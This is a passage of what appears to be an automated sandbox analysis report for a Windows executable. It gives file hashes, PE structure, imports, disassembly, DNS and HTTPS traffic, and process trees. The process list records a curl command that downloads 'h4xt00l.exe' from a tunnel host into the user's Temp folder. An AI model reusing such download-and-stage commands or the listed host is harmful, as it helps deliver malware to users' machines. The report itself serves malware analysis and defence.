                                                                                    SSDEEP:384:IyRVBC9t6Lhz64CHf2slDT90Y5IMQGCHQIYiSy1pCQFm/AM+o/8E9VF0Ny/r5n+/:LGyKHfx1H5IMQGY5YiSyv4AMxkEFNnq
                                                                                    MD5:7C14C7BC02E47D5C8158383CB7E14124
                                                                                    SHA1:5EE9E5968E7B5CE9E4C53A303DAC9FC8FAF98DF3
                                                                                    SHA-256:00BD8BB6DEC8C291EC14C8DDFB2209D85F96DB02C7A3C39903803384FF3A65E5
                                                                                    SHA-512:AF70CBDD882B923013CB47545633B1147CE45C547B8202D7555043CFA77C1DEEE8A51A2BC5F93DB4E3B9CBF7818F625CA8E3B367BFFC534E26D35F475351A77C
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d...`b.f.........." ...(.....2.......................................................o....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pyd

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1138456
                                                                                    Entropy (8bit):5.4620027688967845
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:arEHdcM6hbuCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAIU:arEXDCjfk7bPNfv42BN6yzUAIU
                                                                                    MD5:A8ED52A66731E78B89D3C6C6889C485D
                                                                                    SHA1:781E5275695ACE4A5C3AD4F2874B5E375B521638
                                                                                    SHA-256:BF669344D1B1C607D10304BE47D2A2FB572E043109181E2C5C1038485AF0C3D7
                                                                                    SHA-512:1C131911F120A4287EBF596C52DE047309E3BE6D99BC18555BD309A27E057CC895A018376AA134DF1DC13569F47C97C1A6E8872ACEDFA06930BBF2B175AF9017
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d...`b.f.........." ...(.@..........0*.......................................p.......)....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\h4xt00l.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:modified
                                                                                    Size (bytes):2036
                                                                                    Entropy (8bit):5.210145672839598
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:VDVfYW0P5CwwXzK+oMmlml/DKA0Xt1amo8QfZ8SESGb3/:DGxFAzK+oMCWDKA0X2DfHBWv
                                                                                    MD5:B6F717CDD4DE329F1C7FA66E362600FF
                                                                                    SHA1:A98FAE273452DC5398F2E5B454996364F78AE914
                                                                                    SHA-256:27230504D1F8FCD449E0306B169866BC894214894576A9F7535B7E4246703C30
                                                                                    SHA-512:8317C324CD24375EC6DB06356CD9E952D592F693A969498CB92C07211E08CFC7C8E02900780E1C6DEA6EB4007E1F671D26696D2442E032E91D738C9457ECC9B5
                                                                                    Malicious:false
                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>..<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1">..<title>404 TUNNEL NOT FOUND</title>..<link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet">..</head>..<style>.* {. -webkit-box-sizing: border-box;. box-sizing: border-box;.}.body {. padding: 0;. margin: 0;.}.#error {. position: relative;. height: 100vh;. background-image: linear-gradient(#0b1326 50%, #0e1931 90%);.}.#error .error {. position: absolute;. left: 50%;. top: 50%;. -webkit-transform: translate(-50%, -50%);. -ms-transform: translate(-50%, -50%);. transform: translate(-50%, -50%);.}..error {. max-width: 767px;. width: 100%;. line-height: 1.4;. text-align: center;.}..error .error-msg {. position: relative;.. margin-bottom: 20px;. z-index: -1;.}..error .error-msg h1 {. font-family: 'Nunito', sans-serif;. position: absolu

                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                    Category:dropped
                                                                                    Size (bytes):1835008
                                                                                    Entropy (8bit):4.462947280327378
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:NIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:eXD94+WlLZMM6YFHg+n
                                                                                    MD5:DAE37CC20027B9FFF6B48E850F4CC7E9
                                                                                    SHA1:7E9A3A1EA13C174947CF6A9EA86645B468C6EEFA
                                                                                    SHA-256:C7CCFA6847121CB7FB9D3408F24E9721A83AB28FB3C5474FF78B126DCDBEFC4A
                                                                                    SHA-512:46C0D7B374FEE1C5C435B823113B642432109DE5FA3D8B004151B1E6538E6482E7DA65EC264AC18F037DBED9BA11B2B41B25DAD8FA315DB82D2C6FEBC82E9150
                                                                                    Malicious:false
                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    \Device\ConDrv

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                    File Type:ASCII text, with CR, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):478
                                                                                    Entropy (8bit):3.097721489649575
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivId6Fjai4U0FcKi6on:Vz6ykymUexb1U9cdd6x0qV
                                                                                    MD5:D8EAC298524FCA2B30D1329F1B238C21
                                                                                    SHA1:4B1328811D338821F597160F796A503EFEB97F72
                                                                                    SHA-256:F12C6DA114F3CA2643EDDA03299FEC6F8A506B2154D4848B01F5B0E54EA15A6F
                                                                                    SHA-512:E6F82CF548EC3DCB1C40C22564A5CEA363D7E14B1BBA68445C2C47300EFC87552074AF0928EB8F0418443B495BF9DFEE2E2CDB2E6EF4E281533F8E9E63FA132C
                                                                                    Malicious:false
                                                                                    Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 2036 0 2036 0 0 964 0 --:--:-- 0:00:02 --:--:-- 965.100 2036 0 2036 0 0 961 0 --:--:-- 0:00:02 --:--:-- 962..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Entropy (8bit):7.991043623348911
                                                                                    TrID:
                                                                                    • Win64 Executable GUI (202006/5) 77.37%
                                                                                    • InstallShield setup (43055/19) 16.49%
                                                                                    • Win64 Executable (generic) (12005/4) 4.60%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                    • DOS Executable Generic (2002/1) 0.77%
                                                                                    File name:aLsxeH29P2.exe
                                                                                    File size:7'178'619 bytes
                                                                                    MD5:43f63dde42af90b34befb25ca46e33d7
                                                                                    SHA1:2ad1824df97e3d1275521faed88ede96fe41e035
                                                                                    SHA256:8bd6a723809e23d1c14d7ff528e16e996a3b0b0432e2b7feb4eb5db52c542173
                                                                                    SHA512:e75b1321a6faada88025a6bc1ccb7da197bc3cbe3bd3f13ac01471703e0194be50025006df968881139723a46f6eb448f7c28ddc76f80cb1ec7e68122964b528
                                                                                    SSDEEP:196608:iiCFVEyXMCHGLLc54i1wN+ijXx5nDasqWQ2dTNUGqlf+iITxKvM:BCFVEyXMCHWUj6jx5WsqWxTwITEU
                                                                                    TLSH:A476335553E04DF5E8F7813EE8A3945AEA71B4470764CA9B93D812D20F232E07E78F62
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x14000cdb0
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x140000000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x673F6874 [Thu Nov 21 17:05:56 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007FA20D27139Ch
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    jmp 00007FA20D270FBFh
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007FA20D271768h
                                                                                    test eax, eax
                                                                                    je 00007FA20D271163h
                                                                                    dec eax
                                                                                    mov eax, dword ptr [00000030h]
                                                                                    dec eax
                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                    jmp 00007FA20D271147h
                                                                                    dec eax
                                                                                    cmp ecx, eax
                                                                                    je 00007FA20D271156h
                                                                                    xor eax, eax
                                                                                    dec eax
                                                                                    cmpxchg dword ptr [0003577Ch], ecx
                                                                                    jne 00007FA20D271130h
                                                                                    xor al, al
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    mov al, 01h
                                                                                    jmp 00007FA20D271139h
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    test ecx, ecx
                                                                                    jne 00007FA20D271149h
                                                                                    mov byte ptr [00035765h], 00000001h
                                                                                    call 00007FA20D270895h
                                                                                    call 00007FA20D271B80h
                                                                                    test al, al
                                                                                    jne 00007FA20D271146h
                                                                                    xor al, al
                                                                                    jmp 00007FA20D271156h
                                                                                    call 00007FA20D27E69Fh
                                                                                    test al, al
                                                                                    jne 00007FA20D27114Bh
                                                                                    xor ecx, ecx
                                                                                    call 00007FA20D271B90h
                                                                                    jmp 00007FA20D27112Ch
                                                                                    mov al, 01h
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    inc eax
                                                                                    push ebx
                                                                                    dec eax
                                                                                    sub esp, 20h
                                                                                    cmp byte ptr [0003572Ch], 00000000h
                                                                                    mov ebx, ecx
                                                                                    jne 00007FA20D2711A9h
                                                                                    cmp ecx, 01h
                                                                                    jnbe 00007FA20D2711ACh
                                                                                    call 00007FA20D2716DEh
                                                                                    test eax, eax
                                                                                    je 00007FA20D27116Ah
                                                                                    test ebx, ebx
                                                                                    jne 00007FA20D271166h
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [00035716h]
                                                                                    call 00007FA20D27E492h

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x568.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x2b0000x12a500x12c007541b94dd9589e5198aee6944205e876False0.5245052083333334data5.752722538344455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x470000x5680x6001f909f1505d4aac403fc692b4e3c4933False0.4375data5.515698942150982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_MANIFEST0x470580x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                    Imports

                                                                                    DLLImport
                                                                                    USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                    COMCTL32.dll
                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 11, 2024 11:30:11.025300026 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:11.025362015 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:11.025429964 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:11.035039902 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:11.035065889 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.418260098 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.418359995 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.423098087 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.423115015 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.423389912 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.427176952 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.467328072 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.811297894 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.811394930 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.811465979 CET44349732167.99.38.229192.168.2.4
                                                                                    Dec 11, 2024 11:30:12.811469078 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.811511993 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.836497068 CET49732443192.168.2.4167.99.38.229
                                                                                    Dec 11, 2024 11:30:12.836549997 CET44349732167.99.38.229192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 11, 2024 11:30:10.714101076 CET6462453192.168.2.41.1.1.1
                                                                                    Dec 11, 2024 11:30:11.017467022 CET53646241.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 11, 2024 11:30:10.714101076 CET192.168.2.41.1.1.10xa9e8Standard query (0)haxerr.eu.loclx.ioA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 11, 2024 11:30:11.017467022 CET1.1.1.1192.168.2.40xa9e8No error (0)haxerr.eu.loclx.ioeu.loclx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 11, 2024 11:30:11.017467022 CET1.1.1.1192.168.2.40xa9e8No error (0)eu.loclx.io167.99.38.229A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • haxerr.eu.loclx.io

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449732167.99.38.2294437384C:\Windows\System32\curl.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-11 10:30:12 UTC93OUTGET /h4xt00l.exe HTTP/1.1
                                                                                    Host: haxerr.eu.loclx.io
                                                                                    User-Agent: curl/7.83.1
                                                                                    Accept: */*
                                                                                    2024-12-11 10:30:12 UTC51INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                    Data Ascii: HTTP/1.0 404 Not FoundContent-Type: text/html
                                                                                    2024-12-11 10:30:12 UTC1138INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 54 55 4e 4e 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.go
                                                                                    2024-12-11 10:30:12 UTC898INData Raw: 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 20 2c 20 2d 35 30 25 29 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 45 32 33 45 35 37 3b 0a 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 33 70 78 20 33 70 78 20 23 66 66 66 66 66 66 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 32 30 70 78 3b 0a 7d 0a 2e 65 72 72 6f 72 20 2e 65 72 72 6f 72 2d 6d 73 67 20 68 32 20 7b
                                                                                    Data Ascii: : translate(-50% , -50%); font-size: 224px; font-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 {


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:05:30:09
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\aLsxeH29P2.exe"
                                                                                    Imagebase:0x7ff7f3dd0000
                                                                                    File size:7'178'619 bytes
                                                                                    MD5 hash:43F63DDE42AF90B34BEFB25CA46E33D7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:05:30:09
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\aLsxeH29P2.exe"
                                                                                    Imagebase:0x7ff7f3dd0000
                                                                                    File size:7'178'619 bytes
                                                                                    MD5 hash:43F63DDE42AF90B34BEFB25CA46E33D7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:05:30:10
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe
                                                                                    Imagebase:0x7ff7e0980000
                                                                                    File size:530'944 bytes
                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:05:30:10
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:20.1%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:29
